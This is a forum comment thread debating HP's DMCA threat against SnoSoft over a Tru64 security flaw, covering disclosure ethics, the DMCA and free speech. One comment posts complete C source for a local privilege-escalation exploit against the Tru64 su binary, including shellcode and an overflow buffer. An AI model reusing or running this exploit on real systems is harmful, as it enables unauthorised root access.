  66. Flaws in HP's legal interpretation by guttentag · · Score: 2
    HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
    I would like to point out the flaws in HP's legal interpretation here, but I just don't have $500,000 right now. Maybe tomorrow. It's really a shame... five rent-free years with free meals would give me enough time to write my book about the American-- oh, I can't talk about that either. Never mind.
  67. Re:Dear HP (The Real Thing) by Futurepower(R) · · Score: 2

    not only can their CEO's cheat their shareholders

    not only cannot their CEO's cheat their shareholders

  68. That's not a solution by Anonymous Coward · · Score: 4, Insightful

    I don't see the point of taking HP to task for it.
    It's a waste of time. Even if they back off .. whoopdee doo.

    Please .. what we need is a change in the law.

    Hackers can expose findings and report them to companies .. too often a flaw gets found and the company sweeps it under the rug; maybe they'll fix it in the next version but prior versions are vulnerable.

    Given the sad fact that all our politicians (not just in America but worldwide) are elected by money, maybe the following compromise can be reached:

    a) Hackers who find vulnerabilities must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.

    b) Companies that take no action (that is, don't make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public, are liable for exploits.

    c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.

    Is there any way for you to use your publicity to bring something like this about?

    At least try. I hate the fact that curiosity is now a crime. I am allowed to take apart my car and see how it works .. why can't I do it with the applications I use and store my deeply personal information (from baby pictures to tax and health records) on?

    Thanks,

    Johan

    1. Re:That's not a solution by mpe · · Score: 2

      Please .. what we need is a change in the law.

      Or rather the applicable law or meta-law, in this case the US Constitution actually applied.
      When did the first amendment become "Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof (except where the president likes said religion); or abridging the freedom of speech, or of the press (except when the matter involves electronic computer systems or the profits of large corporations); or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances."

    2. Re:That's not a solution by dillon_rinker · · Score: 2

      Or how 'bout this..."To promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries;"

      You don't even have to go to an amendment for this. Progress is hindered when improvement is impossible. Quashing discoveries of problems eliminates the possibility of improvement. The DMCA, among other things, can make it a crime to announce vulnerabilities in security code and devices (if those are intended to protect copyright). Ergo, the DMCA is unconstitutional.

    3. Re:That's not a solution by Jonny+Ringo · · Score: 2

      Given the sad fact that all our politicians (not just in America but worldwide are elected by money)

      Not all politicians. Nader does not accept any donations from Corporations.

    4. Re:That's not a solution by grmoc · · Score: 2

      The more people threatened by the DMCA and laws of its ilk the better!

      What are you talking about? If few people feel threatened by the law then it remains on the books until some entity decides that it can REALLY roast you.

      Teddy Roosevelt did this in NYC over prohibition.

  69. What will it end up to? by jsse · · Score: 3, Insightful

    I can see it here, the US Government is progressively inventing laws that ensure:

    Only the Government can investigate crimes.
    Only the Government can test, examine, uncover defects in consumer products.
    Only the Government can perform reverse engineering on anything.
    Only the Government is allowed to use top-grade encryption.
    The scope of Free Speech is defined by senators, and it happens that no constitutional rights are being intruded upon.

    That's to say, the US would become a country where citizens, by law, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.

    What's wrong with the picture? I don't know, but I've read a novel about a country whose government has absolute power over its citizens and no citizen is allowed to question the decisions of the government. This government does not use any military power or violence to control its citizens, but laws.

    IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed (brains were separated from their bodies) or terminated (become food for others). It's like the Matrix, but this time some humans control everything.

    ....Imagine, no violence, no crime, no hunger...a perfect world!

  70. Won't use HP in my shop by Sean+Clifford · · Score: 3, Insightful
    Well, then. This clearly demonstrates why *not* to use HP's Unix in your shop; I won't use it in mine. Nor will I use their software or services - you can't trust them. This stupid insular policy against public disclosure only ensures that (a) exploits aren't known, and (b) aren't patched, and (c) cannot be defended against.

    Don't say it...don't say it...I'm warning you...

    Use Linux.

    Damn, I said it.

    Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.

    <rant />
    Clearly some sort of political action is required. I suggest:

    1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit, snailmail, fax, call, email) 'our' reps in the House and Senate, rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.

    2. Abolish corporate personhood (same methods).

    3. Abolish the lobby industry.

    4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.

    We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...

    1. Re:Won't use HP in my shop by zoombat · · Score: 2

      Or you can Email Carly.

  71. Comment removed by account_deleted · · Score: 2

    Comment removed based on user account deletion

  72. As a pre-merger HP employee... by blackwizard · · Score: 2
    ... while I don't think the guy should have released the exploit while they were still talking to HP about the fix, I think the management of HP has been making some heavy-handed decisions. Not just moves like this, but in general... ever since Bill and Dave passed away, it seems the company has lost its heart. It's sad, really.

    I hope you can point them in the right direction, Bruce... and I hope whoever owns this defect has a patch out by tomorrow at noon. =) I know if I owned that code, and I saw this article, I'd be working night and day to get a resolution...

    Of course, this is probably Compaq (a "wholly owned subsidiary" of HP) that we're talking about, so maybe my company isn't going to hell as fast as some might think.

  73. My letter to my Representative and Senators by LordNimon · · Score: 5, Insightful
    This is a letter I just sent to my Representative and Senators. Permission is given to anyone who wants to use this text to send a similar letter.

    Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.

    HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.

    HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix its products, our politicians need to re-examine that law.

    I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.

    --
    And the men who hold high places must be the ones who start
    To mold a new reality... closer to the heart
  74. I need your call on this, please, folks. by Bruce+Perens · · Score: 4, Interesting
    Folks,

    In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:

    Our advisory release policy is full disclosure unless bound by contract.

    Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?

    I would hate to be manipulated in a shakedown of my own company.

    On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.

    What do you think?

    Bruce

    1. Re:I need your call on this, please, folks. by friedmud · · Score: 5, Insightful

      Bruce,

      I guess I don't understand how full disclosure can equate to a shakedown.

      The company (snosoft) seems like a more or less legit research company, and the fact that they have a full disclosure policy in no way says that they are trying to take out companies. It just says, up front, that they have a policy of disclosing these security breaches that they find.

      On the other hand they have to make money somehow - so they contract out their services to companies who wish to have their software audited.

      I could be wrong, but by looking through their posts on security focus, I don't think they are out to extort money from companies - and this is especially true if they gave HP a year to fix this problem (in fact if that is true then you should REALLY stick it to the top brass).

      It could go either way - but it doesn't look like they are in the business of extortion. And the fact that they have been around for a while, and seem to be respected in the security community says quite a lot....

      ON THE OTHER HAND.... I don't see how it is in any way, shape or form right for HP to sic the DMCA on them, no matter what their business practices are. This is a vulnerability in HPQ's software and should not be treated with such arrogance (don't report it or else!).

      Just my $.02

      Derek

    2. Re:I need your call on this, please, folks. by Bruce+Perens · · Score: 5, Interesting
      I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found". If I had written that page, I would have spun that line differently. I don't yet know if my (admittedly paranoid) interpretation represents the way they operate, or not.

      Bruce

    3. Re:I need your call on this, please, folks. by 0xA · · Score: 2

      I get the same impression.

    4. Re:I need your call on this, please, folks. by _Sprocket_ · · Score: 3, Interesting

      It looks like that text has been removed - at least, I don't notice it at that URL (or during a cursory search through the site). Having said that - this does put forward an interesting question.

      How are contracted researchers expected to behave in such a situation?

      It seems that the usual "full disclosure" notice comes from an audit of a product by an external group / individual without contract or invitation by the producer of that product (publicity-grabbing "hacker challenges" aside). Such reports certainly warn the product's user base. But they also seem to be an attempt to embarrass the producer of that product into action - patching the current issue and perhaps increasing future quality control.

      What if the research group is hired by WidgetSoft to audit the Widget2000 and they discover a major vulnerability? It is unlikely the public will ever hear of it from the research group. WidgetSoft will likely develop the patch, and release it with their own report based on the research group's findings.

      But what if WidgetSoft decides to bury the findings? Then our hypothetical research group has a dilemma. It would be wise for this group to be sure their business contract specifically avoids conflicting with their morals.

      Unless, of course, they're in the business of the shake-down.

    5. Re:I need your call on this, please, folks. by AftanGustur · · Score: 2
      I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found".

      Don't let your personal emotions of the moment blind your professionalism..

      --
      echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
    6. Re:I need your call on this, please, folks. by thales · · Score: 3, Insightful
      Bruce,
      Even if it was a company that engaged in outright extortion, i.e. "we just found this hole, pay us $10,000 by Friday or we release it", some advice my Mother gave me comes to mind.

      Two Wrongs Don't Make a Right

      HP's customers are innocent third parties in this matter. Once the exploit was released, no matter how shady the people who released it were, HP should have been trying to notify its customers instead of engaging in a futile attempt to put the cat back in the bag. HP has increased the harm to innocent third parties by not contacting them, and now their actions have ensured that the code for the exploit is more widely distributed than before.

      SnoSoft's actions may have been wrong, but that did not give HP a license to engage in wrong actions of their own.

      --
      Quemadmodum gladius neminem occidit, occidentis telum est
    7. Re:I need your call on this, please, folks. by MaxVlast · · Score: 2

      Huh? I think his comment is very professional. If it is indeed something more-than-is-apparent, then critical thinking (and not just big company wrong) will leave everyone in the best stead.

      --
      There should be a moratorium on the use of the apostrophe.
      Max V.
      NeXTMail/MIME Mail welcome
    8. Re:I need your call on this, please, folks. by jc42 · · Score: 2

      It might be worth pointing out here that, even with a prior contract, the laws of most countries would still require disclosure at some point. No contract can be used to excuse conspiracy to commit illegal acts (such as fraud). The recent accounting scandals have brought this out quite clearly.

      Tru64 Unix is openly marketed for gateway and firewall uses. If there is a known root exploit in such systems, and customers are not informed of the problem, there are good grounds for some serious charges. I'd bet that HP has a flock of lawyers looking at this right now. There's a good chance that they have some big customers also looking at it. If any Tru64 firewall has been rooted in the past year, there may be some big settlements in the news some time in the future.

      If it's true that SnoSoft informed HP of the problem a year ago, then whether there's a contract between them is probably moot. The problem wasn't fixed, so most countries' laws would require SnoSoft to go public with at least the basic facts of the situation. A year is a long time to keep such information secret from vulnerable customers.

      If the problem had been fixed, then we'd expect that HP would be going public with the facts (and the fix).

      --
      Those who do study history are doomed to stand helplessly by while everyone else repeats it.
    9. Re:I need your call on this, please, folks. by Royster · · Score: 2

      I have to say that, the way it's phrased, it does seem like an invitation to buy their silence, which is a pretty sleazy way to do business. The leet handles used by the researchers don't give me the impression of a reputable company either.

      But another poster had an excellent point. You can't be shaken down if you fix the vulnerability.

      I do think that organizations like this who independently investigate and publish their findings do the industry a service. Exploits are found and, if they give the company a chance to fix the problem, they are actually doing a service to the industry.

      Don't punish the messenger even if they are not 'dressed for business'.

      --
      I have discovered a truly marvelous sig, unfortunately the sig limit is too small to contain i
    10. Re:I need your call on this, please, folks. by AftanGustur · · Score: 2
      Huh? I think his comment is very professional.

      He was assuming (without any reference) an underlying purpose so he could suggest an underlying purpose..

      That's not very professional.

      --
      echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
    11. Re:I need your call on this, please, folks. by thrillbert · · Score: 2

      I would hate to be manipulated in a shakedown of my own company

      Bruce,

      There are plenty of researchers who have contracts with companies, which of course prevents them from publicizing their bug discoveries. One of the most notable ones would be Georgi Guninski and Netscape/AOL. While you and I may have jobs at large companies, why would it be wrong for us to make some money by doing our research and charging companies for our work?

      I wrote an email to an individual in response to his BugTraq comments, and in this email I gave him the following example:

      When a car manufacturer puts out a car, and some unlucky bastard finds out about a flaw in the vehicle, this unlucky bastard never gets sued for finding this flaw in the car. On the other hand, he might be the one who gets most of the money from a lawsuit of some sort. The rest of the cars just get recalled and the problem fixed.

      Software vendors should be held as accountable as car manufacturers, especially if a flaw in their software can cause monetary harm to companies running this software.

      HP's attempt at preventing the disclosure of this problem would be equal to Ford and Firestone threatening the families of the crash survivors to keep them from making this information public.

      Does that seem right to you? My guess is that it doesn't, since you were willing to risk a DMCA debacle on yourself.

      The issue is not of liking or disliking HP/Compaq. The issue here is of common sense. Just because you have 12 billion dollars in the bank does not mean you are above the law, and it does not mean that you should be allowed to write crappy code which could cost companies money, and individuals their privacy.

      -thrill

      ---
      The world is coming to an end ... SAVE YOUR BUFFERS!!!

    12. Re:I need your call on this, please, folks. by uucp · · Score: 2, Insightful

      No, Bruce, Snosoft saying "Our advisory release policy is full disclosure unless bound by contract" does not seem like a shakedown to me. HP saying "If SnoSoft and its members fail to cooperate with HP, then this will be considered further evidence of SnoSoft's bad faith" seems much closer to the language used by blackmailing thugs. There is no implied threat in the former, because full disclosure is not a threat. The letter from HP to Snosoft, if the news.com report is accurate, is nothing but a threat.

      That is my call on this. I answered, since you asked. And the reason why I'm not calling you on the phone telling you this is because I think (and I suspect there are others as well that feel similarly) that cold-calling someone like that would be rude. So that would explain why you're getting calls from soulless "reporters" instead of maladjusted geeks.

      --
      Sig (appended to the end of comments you post, 120 chars)
    13. Re:I need your call on this, please, folks. by snosoft · · Score: 2, Interesting

      In response to Bruce:

      "But that sentence sounds a bit like a shakedown, doesn't it?"

      Secure Network Operations provides system security research results to both the public and private sectors in a mutually exclusive manner. We perform independent research and maintain a full disclosure policy for such engagements. We also perform custom security research for private enterprises and government whereby disclosure is limited to our client, and bound by NDA.

      We have also changed our page.

      Regards,
      Adriel T. Desautels
      Founder, Secure Network Operations, inc.

    14. Re:I need your call on this, please, folks. by AftanGustur · · Score: 2
      Reread his post. Bruce ADMITS that maybe his emotions may be influencing his view of the sentence. He simply states that if it were him he would have worded it a little differently.

      No, that's not all he does, indeed he states more than that, this is the post I was replying to, in full:

      I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found". If I had written that page, I would have spun that line differently. I don't yet know if my (admittedly paranoid) interpretation represents the way they operate, or not.

      He states how he interprets the text, by putting words in their mouths.

      A more professional approach would have been to describe his interpretation from his own standpoint, and the reasons for *why* he interprets their words in such a way.
      That way, his sneaky suggestions of foul play could be reasoned.

      And here is my reply to his comment:

      Don't let your personal emotions of the moment blind your professionalism..

      --
      echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
  75. Judges do not always uphold the law by Frank+T.+Lofaro+Jr. · · Score: 2

    Judge Kaplan didn't let EXCEPTIONS WRITTEN INTO THE DMCA ITSELF prevent him from ruling against the DeCSS defendants.

    Don't count on judges to uphold the law.

    (Unless of course, the side that is right is also the side with the most money - which is rarely the case)

    --
    Just because it CAN be done, doesn't mean it should!
  76. Security holes are a BIG deal by Frank+T.+Lofaro+Jr. · · Score: 2

    Computers are now being used extensively in the medical field for everything from life support, diagnosis and treatment to medical records and billing.

    Hacks on billing systems will just cause financial damage, but hacks on the other types of systems CAN KILL.

    Hacking SCADA and industrial control systems can KILL and/or cause MAJOR property and environmental damage.

    Security holes can literally TAKE one's life.

    --
    Just because it CAN be done, doesn't mean it should!
  77. Let's try this again... by User+956 · · Score: 5, Interesting

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>   /* bzero() is declared here, not in string.h */
    #include <unistd.h>

    char shellcode[]=
    "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
    "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

    int main(int argc, char *argv[]) {
        int i, j;
        char buffer[8239];
        char payload[15200];
        char nop[] = "\x1f\x04\xff\x47";

        bzero(buffer, sizeof(buffer));
        bzero(payload, sizeof(payload));

        for (i = 0; i < 8233; i++)
            buffer[i] = 0x41;

        /* 0x140010401 */

        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

        for (i = 0; i < 15000;) {
            for (j = 0; j < 4; j++) {
                payload[i++] = nop[j];
            }
        }

        for (j = 0; j < sizeof(shellcode); i++, j++)
            payload[i] = shellcode[j];

        printf("/bin/su by phased\n");
        printf("payload %db\n", (int) strlen(payload));
        printf("buffer %db\n", (int) strlen(buffer));

        /* execl() needs a null pointer, not the integer 0, as its list terminator */
        execl("/usr/bin/su", "su", buffer, payload, (char *) 0);

        return 0;
    }

    --
    The theory of relativity doesn't work right in Arkansas.
  78. Fruit Of The Poison Tree by tlambert · · Score: 2

    "What difference does it make who finds and reports a bug?"

    We lost a great deal of medical knowledge after WWII when we threw out the data gathered by Dr. Josef Mengele. This medical knowledge was the result of human experimentation on prisoners; some of it will remain lost until someone repeats the unethical human experiments involved.

    So in answer: it has *always* mattered what the source of information is; the ends never justify the means.

    "The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself."

    In this case, it did not. It spoke for a security consulting company, where the publisher of the exploit was a principal. If the exploit had merely spoken for itself, then we wouldn't be having this discussion, because HP would not have had a name to which it could attach their threat of a lawsuit.

    The ends in this case were not even knowledge: they were commercial gain. Knowledge was just a side effect of the process of obtaining the commercial gain. If the commercial gain could have been obtained without the exposure of the security flaw, then there likely would not have been an exposure at all.

    Am I glad the vulnerability was exposed? Yes.

    Do I think HP is playing CYA? Yes.

    Do I think the person who exposed the vulnerability acted ethically, as I would expect a legitimate security researcher to act? No.

    -- Terry

    1. Re:Fruit Of The Poison Tree by richieb · · Score: 2
      So in answer: it has *always* mattered what the source of information is; the ends never justify the means.

      Hmmm. Good point.

      Do I think the person who exposed the vulnerability acted ethically, as I would expect a legitimate security researcher to act? N

      Hmm. Not as clear. Commercial gain is not as bad a reason, especially since the problem has been known to HP for a long time. Plus the gain is very indirect: building reputation, rather than direct payment.

      --
      ...richie - It is a good day to code.
  79. DMCA / McCarthy-style accusations. by oakbox · · Score: 2, Interesting

    Okay, what's to keep one company from slandering another company without any proof? What if Corp A announces that they have found a very destructive hole in Corp B's software, rendering it totally open to attack, but Corp A cannot release this information because of the DMCA.
    Stay with me here: What if there is no vulnerability? Even if Corp B asks Corp A to do so, Corp A can (correctly) claim that they are not allowed to release the information under DMCA. Corp B can't find the vulnerability to fix it. Corp B cannot effectively defend its reputation because the exact charges are not known.
    - oakbox

    --
    Not just answers, the correct questions.
  80. Security Through... by mindriot · · Score: 2

    nice... the old, infamous method of Security through Obscurity has been replaced with a new, much safer one -- Security through DMCA. Way to go!

  81. HP isn't the only one who can sue Snosoft by Sloppy · · Score: 2
    It wasn't the inventor of the CSS "technology" that sued 2600; it was the holder of the copyrighted works that are protected by CSS (MPAA). (There was a DVDCCA case, but that's a separate issue.)

    Anyone who stores copyrighted material on a Tru64 system, and is counting on the system as a technological measure to control access to their work, can sue Snosoft for violating DMCA.

    Alan Cox wasn't worried about Linus or someone else on the kernel team suing him. It's the millions of other people who use Linux, that he can't afford to trust.

    So even if HP backs down, Snosoft's people aren't necessarily out of the woods. Realistically, they probably are. But they can't be 100% sure. That's how bad this law is.

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  82. Re:The EU by Lemmy+Caution · · Score: 3, Insightful

    As long as what you say doesn't jeopardize national security, suggest an interest in terrorism, reveal trade secrets, infringe on copyrights, trademarks, or patents, isn't a description of sexual activities involving anyone under the age of majority, isn't disruptive, doesn't explain how to circumvent copyright, doesn't explain how to acquire or use drugs, isn't seditious, doesn't reveal trade secrets, doesn't threaten our vital national unity during this ongoing and arduous war against terrorism, and is otherwise relatively inoffensive, you can say almost anything you like in the US.

  83. I think if HP knew how much this is going to cost by ajv · · Score: 2

    I recommend on about $2-5m IT purchases a year. If we all tell Carly (in nice positive ways) how much this stupid decision is going to cost them, they'll hopefully see the light, and give up. This is a shame, as I've personally been an HP owner since 1995 and had exemplary service from them for the longest time. Compaq on the other hand has been busy screwing customers of mine since 1990. Their "service" was and always has been a joke where I live. When we paid a large wad of cash in 1997 for a bunch of Digital gear, well, Compaq bought them. I knew then we had signed a multi-million dollar mistake.

    But I have no doubt now that they've threatened a lawsuit, a lawsuit we will have. Hopefully, it'll clear up the boundaries of the awful DMCA.

    Anyway, HP, here's my "fuck you":

    1997: $4,000,000 (at least - a huge deal)
    1998: $1,000,000 (mostly desktops, changed from CPQ to HP cos I liked HP)
    1999: $4,500,000 (start of a nice juicy project)
    2000: $7,500,000 (the tail end of nice juicy project)
    2001: a tiny bit less than $2,000,000
    2002: $3,500,000 (so far)
    2003: ?
    2004: ?
    2005: ?
    2006: ?
    2007: ?
    2008: ?
    2009: ?
    2010: ?
    2011: ?
    2012: ? ....
    2035: ?
    2036: I retire.

    Remember, HP, good friends are hard to come by, enemies are forever.

    Andrew

    --
    Andrew van der Stock
  84. Re:Apache (no one really cares about free-speech) by Max+von+H. · · Score: 2

    Probably because the EU has no "First Amendment"

    We may not have it, but we have the European Court of Human Rights, which can be seized by any citizen (EU or not) and have his/her rights enforced. This court just sticks to the Declaration of Human Rights, which include free speech and plenty of other goodies absent from the US constitution. Even nazi sh*ts are granted rights their countries denied them on behalf of "hate speech" laws and such.

    I also believe we, Europeans, enjoy a pretty nice form of freedom, perhaps even more than the citizens of the USofA. At least I don't risk much being shot by a gun-toting neighbour who thinks I'm a terrorist because I speak a foreign language or have friends from diverse ethnic backgrounds.

    It's about time you Americans stop thinking Europe is some sort of communist dictatorship... Because from here, the USA sure don't look like the place to be if one wants to be free!

    Just my 0.02

    -max

    --
    -- It's always darker before it goes pitch black.
  85. Translation by Observer · · Score: 2
    HP doesn't have the people and resources to fix a potentially serious bug, but it does have the people and resources to claim copyright protection on it.

    True, this is on a product that the company undoubtedly wants to retire as soon as possible, but the message this is sending about its priorities goes considerably wider.

  86. HP is wrong; but hacker was irresponsible by matthew_gream · · Score: 3, Insightful

    I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.

    --
    -- Matthew - matthew.gream@pobox.com, http://matthewgream.net
    1. Re:HP is wrong; but hacker was irresponsible by TeddyR · · Score: 3, Insightful

      The problem is that this gives rise to the other question... How long to wait before making something public?

      The person that made the information public knew that HP has had the information SEVERAL MONTHS before making the exploit public.

      It's true that it may have been better to contact CERT first (note: HP already knew); post to bugtraq, but DESCRIBE the issue and not post the exploit... THEN once the PUBLIC description is made {and still no response from HP} [I say maybe give HP 14 working days] only then post the exploit as was done..

      --
      Time is on my side
  87. Could go two ways by GregWebb · · Score: 2

    Could be, I agree, but I'd read that as 'full disclosure unless you'd hired us to perform a private audit', which is rather more reasonable.

    --

    Greg

    (Inside a nuclear plant)
    Aaaarrrggh! Run! The canary has mutated!

  88. That just makes Tru64 less trustworthy... by TeddyR · · Score: 2

    By doing this HP has just made sure that anyone that finds a real security flaw in their operating system will not publicise the issue. This security through obscurity has been shown to be useless... Even Microsoft now realizes this.

    If the item is not fixed when it is first found and made public, then this means that those flaws can easily stay hidden, and propagate into other subsystems in such a way that fixing it at a later date may become impossible.

    If the problem is not made public, there is a very good chance that real "black hat" underground distributors of the information may have and use the exploits. This could mean that real system admins are kept in the dark while their boxen are rooted from under them. This is because the admins are not made aware of the issues as a result of this action by HP.

    As a result, I would be much less willing to use/trust a Tru64 / HP / CPQ machine since I have no idea if there are security problems that HP hindered from getting fixed.

    --
    Time is on my side
  89. Re:Why you must publish a working exploit. by TeddyR · · Score: 2

    Ah.. but once they say "it is only a theoretical vulnerability" the person that published the info can say... "Nope: here is the code"; or even better, can say in the initial publication "here is the description... and we have working code; which will be published in 14 days from now" and send the vendor the working code...

    Even Microsoft has learned its lesson... {there is still space for improvement... but they are getting better in these situations}

    --
    Time is on my side
  90. Don't forget the first amendment by leereyno · · Score: 2

    Trying to dictate when someone is allowed to say something is in violation of the first amendment. If you live in a country where that doesn't apply then I guess it sucks to live there.

    The real solution is for the vendors themselves to be more proactive and actually search for bugs and vulnerabilities. This isn't a perfect solution, because there is no such thing. Until such time that software is mathematically perfect there will always be bugs (in other words there will always be bugs). What companies like HP need are teams of programmers and legitimate crackers whose job it is to thrash the code as hard as possible to expose vulnerabilities before the criminal crackers find it. If they're too cheap to do this then fuck them and the horse they rode in on.

    If you REALLY want to put an end to crap like the DMCA the very best things you can do are vote and donate money to groups like the EFF and ACLU. Put your money where your mouth is.

    Lee

    --
    Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
    1. Re:Don't forget the first amendment by Catbeller · · Score: 2

      Did corporations even exist at the time the First Amendment was written?

      Nope.

      That's why corporations are not listed. I think that if Jefferson and the rest could see what new class of "citizen" has been created, they'd fire the first musket shot.

      Corporations are not governments -- but they have more power and it seems, no responsibilities save those they voluntarily assume. Hell, they don't even feel responsible to the shareholders anymore.

      Power without responsibility == tyranny, however you slice it.

    2. Re:Don't forget the first amendment by leereyno · · Score: 2

      I wasn't talking specifically about what HP is currently doing. Rather I was responding to the poster's idea about how those who discover exploits should somehow be restrained from disclosing them for a set amount of time. The only authority capable of enforcing such restraint would be the government, therefore the first amendment does definitely apply to the situation I was talking about.

      Everyone is so quick to pipe in that the first amendment only applies to the government. Well keep your britches on because it isn't that simple.

      If you work for a company and part of your job is to keep your mouth shut about something, the fact that the company is requiring this of you as part of a private voluntary relationship (employee/employer) is not a violation of the first amendment. You are free to break off the relationship and save for non-disclosure agreements, in which you voluntarily contract yourself to remain silent, the company has no power to force you to be silent. Even the non-disclosure agreement is one in which it is the authority of the government that is imposing the silence, but one which you have voluntarily agreed to. It is a contract after all. Even servitude (slavery) is legal if it is voluntary.

      If however a company is enlisting the help of the government to force someone to remain silent about something then the first amendment does definitely apply. The company is free to encourage the person to be silent, refuse to have financial dealings with the person and so forth. What they don't have is the legal authority to demand silence.

      What the DMCA has done is allow corporations to hijack the concept of copyright to nullify the first amendment in certain situations. It is therefore itself unconstitutional.

      Lots of people like to blame big corporations for the DMCA. I don't. I blame congress and ultimately the American people for allowing it to be passed. If most of us were taking responsibility for our country by first and foremost voting, keeping abreast of current events and legislative shenanigans, and voicing our opinions to our elected representatives, things like the DMCA would never have a chance.

      Democracy is the fairest of all governments because the people always get what they deserve. The DMCA is no exception.

      Lee

      --
      Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
    3. Re:Don't forget the first amendment by einhverfr · · Score: 2

      Actually, trying to dictate IF someone can say something is a violation of the first amendment. "When" falls under the time/place/manner restrictions. For instance, shouting your message at 110db (somehow) in the middle of town at 3AM is not protected speech.

      Actually, trying to dictate IF someone can EXPRESS something is a violation of the 1st Amendment. Practical aspects of speech are not necessarily protected, according to the Supreme Court. In other words, if I understand the case law correctly, and IANAL, saying "President Bush is an idiot and a child pornographer" may be protected speech (being of political value) regardless of its truth, while saying the same thing about John Katz would be libel, and publishing detailed instructions of how to attempt to carry out an assassination attempt would almost certainly not be protected speech.

      So posting DeCSS for download is probably unprotected, but wearing the source code printed on your shirt as a political statement is probably protected. So posting vulnerability information (how this vulnerability works) is in a gray area and publishing an exploit is probably not protected.

      --

      LedgerSMB: Open source Accounting/ERP
  91. Re:The EU by mpe · · Score: 2

    DMCA is bad but at least at the core of our legal system we have a 1st amendment which prevents attempts at prior restraint,

    The US Constitution is only as good as its enforcement.

    and so over the long term HP couldn't win this sort of thing.

    Unless something were to happen quickly HP would win, since they could afford to drag the case out. When it wants to, the US government is capable of acting quickly. However, they haven't done so in this case.

  92. Thank you Sloppy! by John+Harrison · · Score: 2

    Now I finally understand WHY it is that HP thinks they can sue. I was honestly baffled.

  93. Re:HP has a wonderful opportunity here actually by alcmena · · Score: 2

    I fully agree with you. There is a chance that HP really could make some good out of what happened here.

  94. The realities of the situation as it stands... by Svartalf · · Score: 2
    I just wish people would stop believing that any company exists for the sole reason of increasing the wealth of its shareholders. It used to be that people believed in ethics -- that there are societal responsibilities that compete with shareholder equity. Of course it used to be that the primary purpose of a company was to produce something, which something would hopefully allow a profit.

